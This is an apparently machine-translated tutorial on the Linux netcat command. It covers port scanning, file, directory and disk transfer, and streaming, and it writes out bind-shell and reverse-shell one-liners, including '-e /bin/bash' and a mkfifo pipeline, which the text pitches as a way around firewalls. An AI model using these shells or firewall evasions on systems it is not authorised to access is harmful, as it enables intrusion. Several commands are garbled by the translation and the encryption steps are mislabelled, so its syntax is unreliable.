Netcat is a Swiss Army knife in a network tool that can read and write data through TCP and UDP on the network. By combining and redirecting with other tools, you can use it in a variety of ways in your script. It's amazing what you can do with the Netcat command.
What Netcat do is create a link between the two computers and return two data streams, and what you can do after that is your imagination. You can create a server, transfer files, chat with friends, stream streaming media, or use it as a standalone client for other protocols.
Here are some examples of using netcat.
[A (172.31.100.7) B (172.31.100.23)]
Examples of Linux netcat commands:
1, Port scan
Port scans are often used by system administrators and hackers to find open ports on some machines to help them identify vulnerabilities in the system.
$NC-Z-v-n 172.31.100.7 21-25
Can be run in TCP or UDP mode, by default the Tcp,-u parameter is adjusted to UDP.
The z parameter tells Netcat to use 0 IO, which means that once the connection is closed, no data exchange (Translator Note: Translation is not allowed here, if there are other better, please point out)
The V parameter refers to the use of redundancy option (Translator Note: Verbose output)
The n parameter tells Netcat not to use DNS to reverse-query the domain name of the IP address
This command prints 21 to 25 of all open ports. Banner is a text that banner is a text message sent to you by a service that you connect to. Banner information is useful when you are trying to identify a vulnerability or the type and version of a service. However, not all services will send banner.
Once you find the open ports, you can easily use the Netcat connection service to crawl their banner.
$ nc-v 172.31.100.7 21
The Netcat command connects to open port 21 and prints the banner information that is running on this port.
Chat Server
If you want to talk to your friends, there are a lot of software and information services available for you to use. However, if you do not have such extravagant configuration, such as you in the computer lab, all the external connection is limited, how do you and all the friends sitting in the next room all day to communicate that? Don't be depressed, Netcat provides a way for you to create a chat server, a pre-determined port, so that he can reach you.
Server
$NC-L 1567
The Netcat command initiates a TCP server on port 1567, and all standard outputs and inputs are output to that port. Both the output and the input are shown in this shell.
Client
$NC 172.31.100.7 1567
Whatever you type on machine B will appear on machine A.
3, File transfer
Most of the time, we are trying to transfer files over a network or other tool. There are many ways, like FTP,SCP,SMB and so on, but when you just need to transfer files temporarily or once, it's really worth wasting time installing and configuring a software on your machine. Suppose you want to pass a file file.txt from a to B. A or B can be a server or a client, the following, let a as a server, B is the client.
Server
$NC-L 1567 < file.txt
Client
$NC-n 172.31.100.7 1567 > file.txt
Here we create a server on a and redirect the input of netcat to file file.txt, then when any successful connection is made to that port, Netcat will send file contents.
At the client we redirect the output to File.txt, when B connects to A,a to send the file contents, B saves the file contents to file.txt.
There is no need to create a file source as a server, and we can use it in the opposite way. Like the following we send files from B to a, but the server is created on a, this time we only need to redirect the output of the netcat and redirect the input file of B.
B as Server
Server
$NC-L 1567 > file.txt
Client
NC 172.31.100.23 1567 < file.txt
4, Directory Transfer
Sending a file is simple, but if we want to send multiple files, or the entire directory, it is as simple as using the compression tool tar, compressed and send the compressed package.
If you want to transfer a directory over the network from A to B.
Server
$tar-cvf–dir_name | Nc-l 1567
Client
$NC-N 172.31.100.7 1567 | TAR-XVF-
Here on a server, we create a tar archive package and pass it-redirect it in the console, then use the pipeline, redirecting it to Netcat,netcat to send it over the network.
At the client we download the package through the Netcat pipeline and then open the file.
If you want to save bandwidth transfer compression packets, we can use bzip2 or other tools to compress.
Server
$tar-cvf–dir_name| Bzip2-z | Nc-l 1567
Compression via BZIP2
Client
$NC-N 172.31.100.7 1567 | Bzip2-d |TAR-XVF-
Unzip with BZIP2
5. Encrypt the data you send over the network
If you are concerned about the security of your data being sent over the Internet, you can encrypt it with a tool such as mcrypt before sending your data.
Service side
$NC localhost 1567 | Mcrypt–flush–bare-f-q-d-M ECB > file.txt
Encrypt data using the MCrypt tool.
Client
$mcrypt –flush–bare-f-q-m ECB < file.txt | Nc-l 1567
Use the MCrypt tool to decrypt the data.
The above two commands will prompt for a password, ensuring that the same password is used on both ends.
Here we use MCrypt to encrypt, use any other encryption tool can.
6. Streaming video
While not the best way to generate streaming video, if there are no specific tools on the server, using Netcat, we still have the hope of doing it.
Service side
$cat Video.avi | Nc-l 1567
Here we just read from a video file and redirect the output to the Netcat client
$NC 172.31.100.7 1567 | MPLAYER-VO X11-cache 3000-
Here we read the data from the socket and redirect it to MPlayer.
7, Clone a device
If you have installed a Linux machine and need to repeat the same operation to other machines, and you do not want to repeat the configuration again. Do not need to re-configure the installation process, just start another machine with some boot can drive the disk and clone your machine.
Cloning a Linux PC is simple, assuming your system is on disk/DEV/SDA
Server
$DD IF=/DEV/SDA | Nc-l 1567
Client
$NC-N 172.31.100.7 1567 | DD OF=/DEV/SDA
DD is a tool that reads raw data from disk, I redirect its output through the NETCAT server to another machine and writes it to disk, and it copies all of the information along with the partitioned table. But if we have already partitioned and only need to clone the root partition, we can change SDA to sda1,sda2 according to the location of our system root partition. And so on.
8, open a shell
We have used remote shell-with telnet and ssh, but if these two commands are not installed and we do not have permission to install them, we can also use Netcat to create a remote shell.
Suppose your netcat supports the-C-E parameter (default netcat)
Server
$NC-L 1567-E/bin/bash-i
Client
$NC 172.31.100.7 1567
Here we have created a NETCAT server and indicated that it was executed when it was successfully connected/bin/bash
If Netcat does not support the-C or-e parameter (OpenBSD netcat), we can still create a remote shell
Server
$mkfifo/tmp/tmp_fifo$cat/tmp/tmp_fifo | /bin/sh-i 2>&1 | Nc-l 1567 >/tmp/tmp_fifo
Here we create a FIFO file and then use the Pipeline command to direct the FIFO file content to the shell 2>&1. is used to redirect standard error output and standard output, and then pipe to Netcat to run on port 1567. At this point, we have redirected the output of Netcat to the FIFO file.
Description
Input received from the network is written to the FIFO file
The Cat command reads the FIFO file and sends its contents to the SH command
The SH command process receives input and writes it back to Netcat.
Netcat send output to client via network
As to why it succeeds because the pipeline executes the command in parallel, the FIFO file is used to replace the normal file because the FIFO makes the read wait and if it is a normal file, the cat command ends as soon as possible and begins to read the empty file.
Simply connect to the server on the client
Client
$NC-N 172.31.100.7 1567
You will get a shell prompt on the client
Reverse shell
A reverse shell is a shell that people once opened on the client. The reverse shell is named because it differs from other configurations, where the server uses the services provided by the customer.
Service side
$NC-L 1567
On the client side, simply tell Netcat to execute the shell after the connection is complete.
Client
$NC 172.31.100.7 1567-e/bin/bash
Now, what's so special about the reverse shell?
The reverse shell is often used to circumvent firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 172.31.100.7, and I use a proxy server to connect to the external network. If I want to access this machine from outside the network such as 1.2.3.4 Shell, then I will use the reverse shell for this purpose.
10. Specify the source port
Suppose your firewall filters all the ports except the 25 port, you need to specify the source port using the-P option.
Server-side
$NC-L 1567
Client
$NC 172.31.100.7 1567-p 25
Using a port within 1024 requires root access.
This command will open port 25 for communication on the client, otherwise the random port will be used.
11. Specify the Source address
Suppose your machine has multiple addresses, and you want to explicitly specify which address to use for external data traffic. We can use the-s option in Netcat to specify the IP address.
Server-side
$NC-U-L 1567 < file.txt
Client
$NC-u 172.31.100.7 1567-s 172.31.100.5 > File.txt
The command binds the address 172.31.100.5.
This is just some examples of using netcat.
Other uses include:
- Use the-t option to impersonate the Telnet client,
- The HTTP client is used to download files,
- Connect to the mail server, use the SMTP protocol to check messages,
- Use FFmpeg to intercept screens and share them via streaming, and more. Other more uses.
Simply put, you can use Netcat as a network communication medium to implement various clients as long as you understand the protocol.
Linux netcat command Usage tips